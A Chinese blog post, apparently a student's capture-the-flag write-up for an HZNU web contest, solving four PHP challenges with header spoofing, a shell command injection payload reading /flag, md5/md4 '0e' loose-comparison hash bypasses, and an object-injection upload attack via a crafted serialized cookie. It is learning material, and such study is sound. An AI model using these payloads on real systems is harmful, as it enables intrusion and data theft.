HZNU-web

最新推荐文章于 2024-04-24 20:22:36 发布
最新推荐文章于 2024-04-24 20:22:36 发布
阅读量301 收藏
点赞数
分类专栏: 比赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuermon/article/details/116089312
版权

Signin

在这里插入图片描述
打开场景,说是没有定义的ip,也就是要修改ip地址,直接抓包
在这里插入图片描述
一开始尝试XFF但是没成功,用Client成功了
payload1:
Client-Ip: 127.0.0.1
又说必须要是handsome guys,因此就修改User-Agent,得到flag
在这里插入图片描述
后记:
不知道是操作原因还是环境原因,差点拿一血了来着,唉

Command shell

打开页面就是源码,一步一步来吧

<?php
    error_reporting(0);
    highlight_file(__FILE__);
    if(isset($_GET['file'])){
        $p=$_GET['file'];
        $a = $_GET['a'];
        if(!(is_file($p)===false)){
            if(is_numeric($a) && strlen($a)<8 && ($a**2)==0 &&$a!=0){
                if(substr(md5($_GET['b']),0,6)==='2b3599'){
                $count = $_GET['count'];
                echo "The count is ".exec('printf \'' . $count . '\' | wc -c');
                }else{
                    echo '很近了';
                }
            }else{
                echo "还是太年轻了...";
            }
        }else{
            echo '第一关都过不了?';
        }
    }
?>

0x01:

 $p=$_GET['file'];
 if(!(is_file($p)===false))

要求$p是当前存在的文件的名字,一般都会有index.php,那就直接用吧
payload1:
file=index.php

0x02:

$a = $_GET['a'];
if(is_numeric($a) && strlen($a)<8 && ($a**2)==0 &&$a!=0)

有四个条件,要是数字并且长度小于8,二次幂的值为0,但是又不能为0
直接写出来吧
payload2:
a=1e-199

0x03:

if(substr(md5($_GET['b']),0,6)==='2b3599')

用之前找到的大佬的脚本跑就行了

import hashlib
def main(x):
    for i in range(1,100000000):
        MD5 = hashlib.md5(str(i).encode('utf-8')).hexdigest()
        if MD5[0:6] == str(x):
            print(i)
if __name__ == '__main__':
    main('2b3599')

0x04:

echo "The count is ".exec('printf \'' . $count . '\' | wc -c');

这里才是这道题的重点了
利用exec函数进行命令执行
一开始里面有\'以至于有两个单引号需要自己闭合,并且printf和后面的| wc -c都不用执行,所以可以用管道符截掉
payload3:
count=';cat /flag||'

总的payload:

?file=index.php&a=1e-199&b=17808027&count=%27;cat%20/flag||%27

后记:
其实之前做到过类似(都可以说一模一样了)的题目

Funmd5

打开场景,开始代码审计

<?php
error_reporting(0);
highlight_file(__FILE__);
$flag = file_get_contents('/flag');
$str1 = $_GET['str1'];
$str2 = $_GET['str2'];
if($_GET['num']!==123456 && preg_match('/^123456/',$_GET['num'])){
    echo '1st ok'."<br>";
    
}else{
    die('toooo young');
}

if(is_numeric($str1)){
    $md5_1 = md5($str1);
    $md5_2 = md5($str2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'nnnnb', '12345');
        $b = strtr($md5_2, 'nnnnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}
if ($_GET["hash1"] == hash("md4", $_GET["hash1"]))
{    
    echo $flag;
    
}else{
    die('bad');
}
?>

0x01:
可以使用%0a来绕过比较和preg_match之间的矛盾,但是不知道是我想错了还是环境问题,这道题直接num=123456就过了

if($_GET['num']!==123456 && preg_match('/^123456/',$_GET['num']))

0x02:
这段怪折磨人的,要实现md5加密之后不相等,但是在字符替换之后又相等了
因为没有强制不能查资料,所以最后找到了可以进行爆破的脚本

if(is_numeric($str1)){
    $md5_1 = md5($str1);
    $md5_2 = md5($str2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'nnnnb', '12345');
        $b = strtr($md5_2, 'nnnnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}

exp:

<?php
$count = 0;
for ($i = 1; $i <= 100000000; $i++) {
    $md5 = strtr(md5($i), 'nnnnb', '12345');
    if (preg_match('/^0e\d+$/', $md5)) {
        echo $i . " " . md5($i) . "<br>";
        $count++;
    }
    if ($count == 2) {
        break;
    }
}

payload2:
str1=11230178&str2=20493141

这里实现了md5值不同但是替换之后又相同是因为,php中以0e开头的数字会被认为是0,而如果md5加密之后以0e开头并且在进行strstr函数的替换之后后面的都是数字,那么得出的结果在php松散比较之下就会实现相等
在这里插入图片描述
0x03:

if ($_GET["hash1"] == hash("md4", $_GET["hash1"]))
{    
    echo $flag;
    
}else{
    die('bad');
}

感觉和上一个类似,如果以0e开头的数据被md4加密之后的值也是以0e开头,这样的话应该就可以绕过了
exp:

for($i=1;$i<=10000000000000;$i++){
	$a = '0e'.$i;
	$hash1 = hash("md4",$a);
	if(preg_match('/^0e\d+$/',$hash1){
		echo $a."\n";
		break;
	}
}

payload3:
hash1=0e251288019

最终payload:
?num=123456&str1=11230178&str2=20493141&hash1=0e251288019

Upload

打开场景发现要文件上传
在这里插入图片描述
一开始以为只是简单的文件上传题目,但是把各个方法试了一下之后都没有成功,所以最后没做出来(主要是一开始以为不能用扫描,就不敢扫,没想到原来可以的
发现有index.php文件信息泄露

<?php
spl_autoload_register();
ini_set('display_errors', false);
error_reporting(0);
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> 
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"attach\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
	if($_FILES["attach"]["error"] == 0) {
    if($_FILES["attach"]['size'] > 0 && $_FILES["attach"]['size'] < 102400) {
        $typeAccepted = ["image/jpeg", "image/gif", "image/png"];
        $blackext = ["php", "php5", "php4", "php3", "phtml", "pht", "jsp", "jspa", "jspx","<",">","jsw", "jsv", "jspf","jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer","swf", "htaccess", "ini"];
        $filearr = pathinfo($_FILES["attach"]["name"]);
        if(!in_array($_FILES["attach"]['type'], $typeAccepted)) {
            exit("type error");
        }
        if(in_array($filearr["extension"], $blackext)) {
            exit("extension error");
        }
        $filename = $_FILES["attach"]["name"];
        if(move_uploaded_file($_FILES["attach"]["tmp_name"], $filename)) {    
            array_push($userinfo, $filename);
            setcookie("userinfo", serialize($userinfo), time() + 60 * 60 * 24 * 30);
            echo htmlspecialchars("upload success, new filename is {$filename} .");
        } else {
            echo "upload error!";
        }
    }
} else {
    echo "no upload file";
}
$userinfo = unserialize($_COOKIE["userinfo"]);
?>

0x01:代码审计+解题
前面一大段代码主要就是对上传到文件进行类型和拓展名的过滤,然后可以发现两行比较特别的代码

setcookie("userinfo", serialize($userinfo), time() + 60 * 60 * 24 * 30);
$userinfo = unserialize($_COOKIE["userinfo"]);

设立了userinfocookie并在最后进行反序列化操作,而抓包之后userinfo这个cookie值是我们控的
但是要上传什么文件就不是很清楚了,最后找了资料发现是php对象注入的题目
小记一次PHP对象注入
在这里插入图片描述
在这里插入图片描述
根据上图可知,我们可以上传一个拓展名为inc的文件,并且定义的类名必须与文件名相同即:
我们上传文件info.inc
则文件里面的内容为:

<?php
class info{
	function __wakeup(){
		phpinfo();
   }
}

##############
<?php
class info{
	function __destruct(){
		phpinfo();
   }
}

之后进行抓包,修改MIME,并在cookie中设置userinfo的值为O:4:"info":0:{},因为wakeup魔术方法会在反序列化之前自动调用,这个时候就自动执行phpinfo();
在这里插入图片描述
之后可以修改魔术方法里面的命令得到flag
在这里插入图片描述

ameuu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HZNUOJ-V3-WebApp:HZNU Online Judge V3 WebApp
03-07
【HZNUOJ-V3-WebApp:HZNU在线判题系统V3的Web应用程序】 HZNUOJ(HZNU Online Judge)是一个在线编程练习和评测系统,主要用于教育和竞赛环境,让学生和参赛者可以提交代码并即时获取运行结果和评测报告。其V3版本...
auto-answer-hznu:“理想之光“APP自动答题辅助——浙江省“卡尔马克思杯”浙江省大学生理论知识竞赛(初赛),纯技术交流
05-18
今天(2018.04.14)看到班级群发了《关于组织阿里巴巴商学院学生参加浙江省“卡尔马克思杯”浙江省大学生理论知识竞赛(初赛)的通知》,附带题库,于是心里。。。没错,写这个项目就仅是为了娱乐,顺便完成作业。...
如何绕过校园网认证,不付费就可以使用自己的网络。
热门推荐
qq_41155672的博客
03-14 32万+
绕过校园网认证。
php对象注入,小记一次PHP对象注入
weixin_39614146的博客
03-11 139
[PHP] 纯文本查看 复制代码if($_FILES["attach"]["error"] == 0) {if($_FILES["attach"]['size'] > 0 && $_FILES["attach"]['size'] < 102400) {$typeAccepted = ["image/jpeg", "image/gif", "image/png"];$bl...
GlitchBot -HZNU寒假集训
alnxtmp169007749的博客
03-03 145
One of our delivery robots is malfunctioning! The job of the robot is simple; it should follow a list of instructions in order to reach a target destination. The list of instructions is originall...
php 对象注入,小记一次PHP对象注入
weixin_42297390的博客
03-28 192
[PHP] 纯文本查看 复制代码if($_FILES["attach"]["error"] == 0) {if($_FILES["attach"]['size'] > 0 && $_FILES["attach"]['size'] < 102400) {$typeAccepted = ["image/jpeg", "image/gif", "image/png"];$bl...
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 1936
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
HZNUCTF -- web
pwfortune的博客
04-24 703
(我开始做的时候也是想拼接绕过来着,一直没成功,感觉应该是格式的问题,失败了几次也就直接放弃了,感觉不会这么简单的直接就是引号拼接)是做了一个类似前端的验证啥的,只要出现了 flag 或者 /f* 啥的就会返回那个假的的flag。(尝试ls 只能列出当前目录,列不出根目录,无法cat ,所以尝试 env命令),需要特殊处理 ,[ 就被转换成 _ ,且后面的 点号 . 也可以正常传了。要传参 s_1.1 因为php特性的关系,正常传不了 点号 .但是这道题可以列出来目录,无法读取文件,没有权限,需要提权。
NSSCTF-[HZNUCTF 2023 preliminary]-web
J1ng_Hong的博客
11-13 422
进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。由于序列化中的b代表着Boolean,所以我试着把0改为1。然后我们就看到了回显,但是没找到flag。
HZNU ACM-ICPC Platform Research & Design中期答辩PPT
03-08
HZNU ACM-ICPC Platform Research & Design中期答辩PPT
Screenshot_2024-05-14-22-47-39-925_com.alibaba.android.rimet.hznu.jpg
05-14
Screenshot_2024-05-14-22-47-39-925_com.alibaba.android.rimet.hznu.jpg
Repository:HZNU代码资源存储
03-23
【标题】HZNU代码资源存储库是一个公开的、与系统开源相关的代码集合,它主要包含了来自杭州师范大学(HZNU)的各类编程项目和学习资源。这个仓库为学生、教师和其他IT从业者提供了一个共享和学习代码的平台,有助于...
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
07-08
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
2003-2023年飞机航线信息数据.xlsx
07-08
2003-2023年飞机航线信息数据 1、时间:2003-2023年 2、来源:高铁航线数据库(Chinese High-speed Rail and Airline Database,CRAD) 3、指标:起点城市、起点城市所属地级市、起点城市所属省份、起点机场、终点城市、终点城市所属地级市、终点城市所属省份、终点机场、航空公司、更新日期、航班、出发时间、到达时间、准点率、班次_周一、班次_周二、班次_周三、班次_周四、班次_周五、班次_周六、班次_周日
Xilinx Vitis 2020工程源目录修改
07-08
Xilinx Vitis可以做standalone程序开发,不过其工程中使用的路径为绝对路径。工程更换位置后编译将会显示错误。例如:源目录为D:/work,复制到同事电脑上放到C:/work(同事电脑只有一个C盘)。利用Vitis打开工程编译会有一堆错误,提示文件找不到。本脚本用来解决该问题。
1000__gpt_4_prompts.md
07-08
1000__gpt_4_prompts
电子行业点评:算力需求持续提升,景嘉微强势入局.pdf
最新发布
07-08
电子元件 电子行业 行业分析 数据分析 数据报告 行业报告
Python设计指导文件
07-08
Python设计指导文件
帮我用C语言写一段打印“HZNU欢迎您”图案的代码
03-06
#include int main() { printf(" H H ZZZZZ N N U U 欢迎您\n"); printf(" H H Z NN N U U 欢迎您\n"); printf(" H H Z N N N U U 欢迎您\n"); printf(" HHHHH Z N NN U U 欢迎您\n");... printf(" H H Z N N U U...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值